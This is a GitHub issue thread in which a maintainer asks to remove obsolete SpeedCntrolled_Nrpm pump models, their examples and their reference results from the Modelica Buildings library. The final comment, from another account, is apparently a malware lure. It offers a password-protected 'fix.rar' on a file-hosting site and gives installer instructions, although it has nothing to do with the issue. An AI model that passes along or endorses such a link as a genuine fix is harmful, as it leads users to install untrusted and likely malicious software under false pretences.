### ISSUE TITLE
Remove SpeedCntrolled_Nrpm models in Obsolete package

### ISSUE THREAD

**Issue by mwetter** [lbl-srg/modelica-buildings#3968]
With the introduction of https://github.com/lbl-srg/modelica-buildings/issues/3965, the examples for `Obsolete*SpeedCntrolled_Nrpm` no longer work (as the replaceable is not valid). This model and the similar one that is preconfigured, was retired in May 2023 and can be removed now.

There are also various examples that use `Obsolete*SpeedCntrolled_Nrpm` which can also be removed, together with the `.mos` files and reference results.

@hcasperfu  : Can you please make this change and also update the release notes. The same should also be done in `IBPSA` as the changes from https://github.com/lbl-srg/modelica-buildings/issues/3965 will be discussed for introduction to `IBPSA`.

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
